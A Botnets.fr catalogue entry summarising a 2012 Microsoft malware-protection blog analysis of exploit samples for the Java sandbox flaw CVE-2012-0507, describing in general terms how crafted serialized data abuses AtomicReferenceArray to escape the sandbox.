An interesting case of JRE sandbox breach (CVE-2012-0507)

From Botnets.fr
Jump to: navigation, search
An interesting case of JRE sandbox breach (CVE-2012-0507)
Botnet
Malware Zbot
Botnet/malware group
Exploit kits
Feature
Distribution vector
Target
Campaign
Vulnerability
CCProtocol
Date 2012 / 20 Mar 2012
Editor/Conference Microsoft
Link http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx blogs.technet.com (blogs.technet.com Archive copy at the Wayback Machine)
Author Jeong Wook (Matt) Oh, Chun Feng
Type

Abstract

Recently we received a few samples that exploit the latest patched JRE (Java Runtime Environment) vulnerability. These samples are kind of unusual to see, but they can be used to develop highly reliable exploits. The malicious Java applet is loaded from an obfuscated HTML file. The Java applet contains two Java class files - one Java class file triggers the vulnerability and the other one is a loader class used for loading.

The vulnerability triggering class is actually performing deserialization of an object array and uses a vulnerability in the AtomicReferenceArray to disarm the JRE sandbox mechanism. The attacker deliberately crafted serialized object data. This reference array issue is very serious since the exploit is not a memory corruption issue, but a logical flaw in the handling of the array. So the exploit is highly reliable and that might be one of the reasons why the bad guys picked up this vulnerability for their attacks. We determined this vulnerability to be CVE-2012-0507.